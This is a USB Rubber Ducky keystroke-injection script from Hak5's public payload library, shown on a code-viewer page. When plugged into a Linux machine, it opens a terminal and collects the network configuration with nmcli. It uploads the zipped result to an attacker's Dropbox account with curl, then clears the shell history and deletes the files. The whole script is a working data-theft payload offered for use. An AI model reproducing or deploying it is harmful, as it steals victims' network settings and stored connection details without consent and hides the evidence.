CoCalc -- payload.txt

GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
²⁹⁷¹ views
1

2
REM ##########################################################
3
REM #                                                        |
4
REM # Title        : Exfiltrate Linux Network Configuration  |
5
REM # Author       : Aleff                                   |
6
REM # Version      : 1.0                                     |
7
REM # Category     : Exfiltration, Execution                 |
8
REM # Target       : Linux                                   |
9
REM #                                                        |
10
REM ##########################################################
11

12
REM Requirements:
13
REM     - Internet Connection
14
REM     - Dropbox Account
15
REM     - - DROPBOX_ACCESS_TOKEN
16

17
DELAY 1000
18
CTRL-ALT t
19

20
DELAY 2000
21
REM Required: Set here your Dropbox access TOKEN
22
DEFINE TOKEN example
23
STRING ACCESS_TOKEN="
24
STRING TOKEN
25
STRING "
26
ENTER
27

28
REM DELAY 500
29
REM STRING USER_NAME=$(whoami)
30
REM ENTER
31

32
DELAY 500
33
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
34
ENTER
35

36
DELAY 500
37
STRING ZIP_NAME="$RANDOM.zip"
38
ENTER
39
DELAY 500
40
STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
41
ENTER
42

43
REM Folder path
44
DELAY 500
45
STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
46
ENTER
47

48
DELAY 500
49
STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
50
ENTER
51

52
DELAY 1000
53
STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
54
ENTER
55

56
DELAY 1000
57
STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
58
ENTER
59

60
DELAY 1000
61
REM Delay for zipping operation, it depends by computer power and folder directory
62
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
63
DELAY 3000
64

65

66
REM Set yout Dropbox folder name
67
DEFINE DROPBOX_FOLDER_NAME example
68
STRING DROPBOX_FOLDER="/
69
ENTER
70
STRING DROPBOX_FOLDER_NAME
71
ENTER
72
STRING "
73
ENTER
74
DELAY 500
75

76
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
77
STRING curl -X POST
78
STRING DROPBOX_API_CONST
79
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
80
ENTER
81

82
DELAY 2000
83
STRING history -c
84
ENTER
85

86
DELAY 500
87
STRING rm -rf "$TMP_FOLDER_PATH"
88
ENTER
89

90
DELAY 500
91
STRING rm -rf "$ZIP_PATH"
92
ENTER
93

94
DELAY 500
95
STRING exit
96
ENTER
97
Product

Resources

Company
